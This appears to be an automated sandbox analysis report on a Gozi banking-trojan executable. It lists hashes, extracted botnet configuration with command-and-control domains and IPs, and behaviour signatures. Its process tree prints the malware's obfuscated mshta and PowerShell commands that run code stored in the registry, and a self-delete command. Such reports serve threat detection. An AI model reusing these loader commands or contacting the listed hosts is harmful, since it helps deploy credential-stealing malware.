Overview

overview

10

Static

static

3

bf237f642c...JC.exe

windows7-x64

10

bf237f642c...JC.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-09-2023 15:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bf237f642cd049be1e0be68de0f3bd6ed97be7d05059fb2825f94fd0a5afebfd_JC.exe

  • Size

    422KB

  • MD5

    c788f8e7a2d0311297bd198ca9d05ec8

  • SHA1

    64240992ba99ae27b0bb4fe277a95524a4b139db

  • SHA256

    bf237f642cd049be1e0be68de0f3bd6ed97be7d05059fb2825f94fd0a5afebfd

  • SHA512

    2295c28aa11e3c1ea09f0ba790ea1e8322b3c996f4f27bf0aec9edf0997329ea8d13b98417e856f7bd922f4a0d9ef786117b8354a04b752d53e6b53733db4f5d

  • SSDEEP

    6144:eH0vsBFRMXdX0tn7qnmUVR9g0pHii2B8mG+R2FLxgwExgw:eH0v4FRyX0tnWnN9pHiN4+R2NxEx

Score
10/10
gozi5050bankerdaveisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

netsecurez.com

whofoxy.com

mimemoa.com

ntcgo.com
Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

31.41.44.79

185.248.144.203

netsecurez.com

whofoxy.com
Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Dave packer 1 IoCs

    Detects executable using a packer named 'Dave' by the community, based on a string at the end.

    dave
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4888
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:4032
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3676
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3116
        • C:\Users\Admin\AppData\Local\Temp\bf237f642cd049be1e0be68de0f3bd6ed97be7d05059fb2825f94fd0a5afebfd_JC.exe
          "C:\Users\Admin\AppData\Local\Temp\bf237f642cd049be1e0be68de0f3bd6ed97be7d05059fb2825f94fd0a5afebfd_JC.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5096
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qrw2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qrw2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9\\\MemoryLocal'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4332
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xffohqhga -value gp; new-alias -name hbcjafmtm -value iex; hbcjafmtm ([System.Text.Encoding]::ASCII.GetString((xffohqhga "HKCU:Software\AppDataLow\Software\Microsoft\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9").ProcessActive))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3688
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g2qwolmc\g2qwolmc.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3040
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED0.tmp" "c:\Users\Admin\AppData\Local\Temp\g2qwolmc\CSCD64CDD8E6B5342F596D5811C2AE21F5B.TMP"
                5⤵
                  PID:968
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jd0elfgr\jd0elfgr.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3856
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1066.tmp" "c:\Users\Admin\AppData\Local\Temp\jd0elfgr\CSC94C9A0E9E47F482380118F74240969C.TMP"
                  5⤵
                    PID:3432
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\bf237f642cd049be1e0be68de0f3bd6ed97be7d05059fb2825f94fd0a5afebfd_JC.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:408
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:3704
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:3532
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:2388

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\RES1066.tmp
              Filesize

              1KB

              MD5

              0a58d4de29cd860316b851867ba880ff

              SHA1

              db630218678b50baf6a8703b542996de4d6d9f10

              SHA256

              2f26afd28c98fedc487b843b62c2a043ca5fbe61d74f728bc337be1c5a9a03c1

              SHA512

              8b3ca2f4917dd80bc04b74dfb50e9b315980adbf45c118637fe8c6d66d8af407b1f3b9339e8e1fa1e3cb4c4b42f0e195439766a9140dd050bb729e772cea0810

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\RESED0.tmp
              Filesize

              1KB

              MD5

              3392d99a718d1af41f72e3573dff3849

              SHA1

              bc4e915aba3917c707b23b24d99f5c2aa6e61c00

              SHA256

              9944b0d934be3e993f45a1a925205220d7fe74c0bf484697082523112939fd9a

              SHA512

              68ea2b5000b9078d94a221d3b28365ce52a1ecb3e9164e292bea0f7e27450227c789b790f14edf805b6a0c28ee65bf71a20540c4d6d643cad05ae290a0f871a3

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_brvpoezg.23o.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\g2qwolmc\g2qwolmc.dll
              Filesize

              3KB

              MD5

              840e6cfbdfb33617d448b431c8699a41

              SHA1

              6479659f21b1334ca3490b9952cabc6fade9e4d9

              SHA256

              f4af890d1db4aed94b710c29a68193c44acac29019d0db90227d2c2ed471b742

              SHA512

              9cd0a48ac736705d4b8bf9b909b44039765355aae01a81378edfcf22050b44cec5cc5a6962da2cc42acb2fbf40d247f3c798fd0213bfdaa61b670431be5c745a

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\jd0elfgr\jd0elfgr.dll
              Filesize

              3KB

              MD5

              2191837468810ca8f5ab28615eeb8919

              SHA1

              2a412d08ac4a4917722f407000b1351ca514f667

              SHA256

              0d430db5272f96fb6939724a7cd10800b7f5eab4bcd807e6a950fe0d6365642a

              SHA512

              46fc70105e9a0dc8ece6a8223452817108d8249102617c534cfbacd895c93cbfb6bef3c11d586a021ae2456a50db3a21f4008bc7b81e486848aee10f817be7c4

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\g2qwolmc\CSCD64CDD8E6B5342F596D5811C2AE21F5B.TMP
              Filesize

              652B

              MD5

              8453b913c39f11329e0f50f6586df176

              SHA1

              56d5c5d8a7a85a29df1a9ec9dead5dec0a3dfe64

              SHA256

              01c41a4dd600f18dd9968c18d79ad0d126396d0df51c005a716072bc2340e375

              SHA512

              334d687faa4056bd3978c8dfb64171cd48e91ea732ed34744b24f8f83420c5b6557d35d4d844a3fc11174ea13fef28aae1f76870a1b196b067c94dd671088290

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\g2qwolmc\g2qwolmc.0.cs
              Filesize

              405B

              MD5

              caed0b2e2cebaecd1db50994e0c15272

              SHA1

              5dfac9382598e0ad2e700de4f833de155c9c65fa

              SHA256

              21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

              SHA512

              86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\g2qwolmc\g2qwolmc.cmdline
              Filesize

              369B

              MD5

              7f85654dfdd699104059360674fc64b4

              SHA1

              9a713f65a28cff68f09fdda432e7191d8f03dabb

              SHA256

              fd394d2e4b38440bf7873847fd8e91c3fdb1bafaf438b68f91dc7e82ed2a70f6

              SHA512

              0c01ae354b0bff6c142360b883dc26f59dead41fe7b81c67dfe419d09fd665fd2a068b130fa35386d2d169450b4af0f52a7e3745f20f8026dc816c355452b455

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\jd0elfgr\CSC94C9A0E9E47F482380118F74240969C.TMP
              Filesize

              652B

              MD5

              d8259f0e528b943d57b37c40bd708624

              SHA1

              02c9480f2010d1fba22a1f21c67780e857ae832b

              SHA256

              712a6369c6b3e8522a6e818259e02b7aa93c5db4f894efc4ecc2c5895d75156e

              SHA512

              5d79c3c6167af9be121f6c2208853aafd44c3e69449b1d67e1a0c0a928bfc11b6b75f61f380a675238d37d71679369724edcf150f11848238ada3bf43a9a24c3

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\jd0elfgr\jd0elfgr.0.cs
              Filesize

              406B

              MD5

              ca8887eacd573690830f71efaf282712

              SHA1

              0acd4f49fc8cf6372950792402ec3aeb68569ef8

              SHA256

              568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

              SHA512

              2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\jd0elfgr\jd0elfgr.cmdline
              Filesize

              369B

              MD5

              a38c569fbebb4c40ec692b5492592627

              SHA1

              379d7c218121c6dd36bb19912e8165ea6afd01c0

              SHA256

              47bccb7560057fd0395bc166358a0920dc9980bc65fd09e4ca6bfeb1f5222046

              SHA512

              27e3452e4f06b13f73d591d44045715d4ecd0b581c4bdc542365936f67e2afd191c05397b67baaa76ec0bfa4e7fd078271d755871e5fa2a83a779f2762f0ab57

              Download Submit

            • memory/408-103-0x00000160BB240000-0x00000160BB241000-memory.dmp

              Filesize

              4KB

              Download

            • memory/408-99-0x00000160BB350000-0x00000160BB3F4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/408-124-0x00000160BB350000-0x00000160BB3F4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/2388-94-0x000001AD5B240000-0x000001AD5B241000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2388-125-0x000001AD5B600000-0x000001AD5B6A4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/2388-92-0x000001AD5B600000-0x000001AD5B6A4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3116-100-0x0000000008F80000-0x0000000009024000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3116-61-0x0000000008F80000-0x0000000009024000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3116-62-0x0000000002E20000-0x0000000002E21000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3532-120-0x0000000000C00000-0x0000000000C98000-memory.dmp

              Filesize

              608KB

              Download

            • memory/3532-109-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3532-108-0x0000000000C00000-0x0000000000C98000-memory.dmp

              Filesize

              608KB

              Download

            • memory/3676-76-0x000002B7361E0000-0x000002B7361E1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3676-113-0x000002B736130000-0x000002B7361D4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3676-75-0x000002B736130000-0x000002B7361D4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3688-59-0x00000201477F0000-0x000002014782D000-memory.dmp

              Filesize

              244KB

              Download

            • memory/3688-57-0x00000201477E0000-0x00000201477E8000-memory.dmp

              Filesize

              32KB

              Download

            • memory/3688-74-0x00000201477F0000-0x000002014782D000-memory.dmp

              Filesize

              244KB

              Download

            • memory/3688-30-0x000002012D770000-0x000002012D780000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3688-28-0x000002012D770000-0x000002012D780000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3688-27-0x00007FFC0F4F0000-0x00007FFC0FFB1000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/3688-72-0x00007FFC0F4F0000-0x00007FFC0FFB1000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/3688-43-0x00000201477C0000-0x00000201477C8000-memory.dmp

              Filesize

              32KB

              Download

            • memory/3688-23-0x0000020147650000-0x0000020147672000-memory.dmp

              Filesize

              136KB

              Download

            • memory/3688-29-0x000002012D770000-0x000002012D780000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3704-115-0x00000213604F0000-0x0000021360594000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3704-117-0x00000213602A0000-0x00000213602A1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3704-123-0x00000213604F0000-0x0000021360594000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4032-121-0x000001649BF00000-0x000001649BFA4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4032-82-0x000001649BEC0000-0x000001649BEC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4032-81-0x000001649BF00000-0x000001649BFA4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4888-87-0x000002E2D6910000-0x000002E2D69B4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4888-122-0x000002E2D6910000-0x000002E2D69B4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4888-88-0x000002E2D61B0000-0x000002E2D61B1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/5096-5-0x0000000002560000-0x000000000256F000-memory.dmp

              Filesize

              60KB

              Download

            • memory/5096-11-0x00000000025D0000-0x00000000025DD000-memory.dmp

              Filesize

              52KB

              Download

            • memory/5096-1-0x0000000002540000-0x000000000254C000-memory.dmp

              Filesize

              48KB

              Download

            • memory/5096-14-0x0000000002520000-0x0000000002533000-memory.dmp

              Filesize

              76KB

              Download

            • memory/5096-0-0x0000000002550000-0x000000000255F000-memory.dmp

              Filesize

              60KB

              Download